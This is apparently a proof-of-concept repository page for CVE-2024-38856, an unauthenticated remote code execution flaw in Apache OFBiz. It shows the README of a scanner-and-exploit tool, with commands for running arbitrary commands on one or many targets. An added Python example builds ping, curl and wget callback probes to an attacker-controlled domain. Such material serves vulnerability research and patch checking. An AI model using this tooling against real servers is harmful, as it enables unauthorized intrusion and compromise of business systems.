
CVE-2024-38856 PoC — Apache OFBiz: Unauthenticated endpoint could allow execution of screen rendering code

Source
Associated vulnerability
Title: Apache OFBiz: Unauthenticated endpoint could allow execution of screen rendering code (CVE-2024-38856)
Description: Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check the user's permissions because they rely on the configuration of their endpoints).
Repository description: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)
Readme
# CVE-2024-38856

For ethical use only. Harmful or malicious activity is not allowed, and you are solely responsible for how you use this tool.

CVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit

- Affects Apache OFBiz through 18.12.14; fixed in 18.12.15, so upgrading is the remediation.
# Usage
```


 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗     ██████╗  █████╗  █████╗ ███████╗ ██████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║     ╚════██╗██╔══██╗██╔══██╗██╔════╝██╔════╝ 
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗█████╔╝╚█████╔╝╚█████╔╝███████╗███████╗ 
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝╚═══██╗██╔══██╗██╔══██╗╚════██║██╔═══██╗
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║     ██████╔╝╚█████╔╝╚█████╔╝███████║╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝     ╚═════╝  ╚════╝  ╚════╝ ╚══════╝ ╚═════╝ 
                                                                                                            
                                                                                                                                                           
                                                                                                                                                              
                    Github: https://github.com/securelayer7/CVE-2024-38856_Scanner
                                By: Securelayer7(yosef0x01 & Zeyad Azima)                                     

usage: cve-2024-38856_Scanner.py [-h] [-t TARGET] [-p PORT] [-c COMMAND] [-s] [-d DOMAIN] [-f FILE]

CVE-2024-38856 Apach Ofbiz RCE Scanners.

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target host
  -p PORT, --port PORT  Target port
  -c COMMAND, --command COMMAND
                        Command to execute
  -s, --scan            Perform scan with ping, curl, and wget
  -d DOMAIN, --domain DOMAIN
                        Domain (attacker domain) to scan with ping, curl, and wget
  -f FILE, --file FILE  File containing a list of targets in the format http(s)://target,port

```
## Arguments

- `-t, --target <host>`: Specifies the target host. Cannot be combined with `--file`.

- `-p, --port <port>`: Specifies the target port. When reading a targets file, this option is required for entries that do not carry their own `,port` suffix.

- `-c, --command <command>`: Specifies the command to execute on the target.

- `-s, --scan`: Enables scan mode. Instead of a user-supplied command, the script runs a fixed set of out-of-band probes (`ping`, `curl`, `wget`) against the domain given with `--domain`; a vulnerable host shows up as a DNS or HTTP request arriving at that domain. This relies on the target having outbound network access and those tools installed, so a host that stays silent is not proof that it is patched.

- `-d, --domain <domain>`: Specifies your attacker-controlled domain that the `ping`, `curl` and `wget` probes call back to. Must be used together with `--scan`.

- `-f, --file <file>`: Specifies a file containing one target per line in the format `http(s)://target,port`. Cannot be combined with `--target`.


`Global port`: when scanning from a targets file, you can omit `,port` on the entries and pass `-p` once to set a global port for all of them.
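The following is an added example, not code from the scanner or from SecureLayer7: it parses a targets file in the `http(s)://target,port` format described above, applies the global-port fallback, and builds the `ping`/`curl`/`wget` out-of-band probes that scan mode depends on. The per-target label prefixed to the callback domain is an assumption of this example (the original tool does not document one); it is there so a callback arriving at your listener can be attributed to the host that made it. The targets file content is constructed sample data.

```python
"""Targets-file parser and out-of-band probe builder for a CVE-2024-38856 style
scanner. Added example, not the scanner's own code."""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample of a targets file: one entry with an explicit port, one
# that relies on the global port, one comment line and one blank line.
SAMPLE_TARGETS = """\
# constructed sample, not real hosts
https://ofbiz.example.test,8443
http://10.0.0.5

http://erp.example.test,8080
"""


@dataclass(frozen=True)
class Target:
    scheme: str
    host: str
    port: int

    @property
    def base_url(self) -> str:
        return f"{self.scheme}://{self.host}:{self.port}"


def parse_target_line(line: str, global_port: int | None = None) -> Target | None:
    """Parse one `http(s)://host,port` line.

    Returns None for blank and comment lines. Raises ValueError when the line
    carries no port and no global port (the `-p` value) was supplied, which is
    the error the scanner's `--file` mode would otherwise hit half-way through.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    url, _, port_text = line.partition(",")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"expected http(s)://host[,port], got {line!r}")
    if port_text.strip():
        port = int(port_text)
    elif parts.port:  # also tolerate http://host:port without the comma
        port = parts.port
    elif global_port is not None:
        port = global_port
    else:
        raise ValueError(f"no port for {line!r} and no global port (-p) set")
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return Target(parts.scheme, parts.hostname, port)


def parse_targets(text: str, global_port: int | None = None) -> list[Target]:
    """Parse a whole targets file; fails fast on the first malformed entry."""
    targets = []
    for line in text.splitlines():
        target = parse_target_line(line, global_port)
        if target is not None:
            targets.append(target)
    return targets


def oob_commands(target: Target, domain: str) -> dict[str, str]:
    """Build the ping/curl/wget probes scan mode sends to the attacker domain.

    The `<host>-<port>.<domain>` label is this example's assumption: each probe
    resolves a distinct subdomain, so a DNS or HTTP hit at the listener maps
    back to exactly one target.
    """
    label = re.sub(r"[^a-z0-9]", "-", f"{target.host}-{target.port}".lower())
    callback = f"{label}.{domain}"
    return {
        "ping": f"ping -c 1 {callback}",
        "curl": f"curl -s http://{callback}/",
        "wget": f"wget -q -O /dev/null http://{callback}/",
    }


if __name__ == "__main__":
    for t in parse_targets(SAMPLE_TARGETS, global_port=8080):
        print(t.base_url, oob_commands(t, "oob.attacker.test")["curl"])
```

Run it as-is to see the three parsed targets and their `curl` probes; pointing a DNS or HTTP listener at the callback domain is what turns a probe into a confirmation.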

## Single Target

- Normal Mode
```bash
python cve-2024-38856_Scanner.py -t <target> -p <port> -c "command"
```

![image](https://github.com/user-attachments/assets/e270c4ba-7ec6-416c-bfb3-2cec44436236)



- Scan Mode
```bash
python cve-2024-38856_Scanner.py -t <target> -p <port> -s -d <domain>
```

![image](https://github.com/user-attachments/assets/3dc43ac3-5608-4dae-9dbf-8528b43a8577)



## Targets File

- Normal Mode
```bash
python cve-2024-38856_Scanner.py -f <file> -c "command"
```

![image](https://github.com/user-attachments/assets/8ca2274b-e9ff-44ae-b3e7-dc021bcc7c78)



- Scan Mode W/ Global Port
```bash
python cve-2024-38856_Scanner.py -f <file> -p <port> -s -d <domain>
```
![image](https://github.com/user-attachments/assets/8a7559c4-1519-4974-baba-e4b5a50edbf5)



# Screenshots

![image](https://github.com/user-attachments/assets/44cc9acb-efd8-4e77-915a-389a338ec773)



![image](https://github.com/user-attachments/assets/0a81db4e-4b91-401a-9605-08297d0e1cf0)



File snapshot
```
[4.0K] /data/pocs/825e76d69ec88b65a1e866c3f7f91c4ca1929256
├── [7.8K] cve-2024-38856_Scanner.py
└── [5.1K] README.md

0 directories, 2 files
```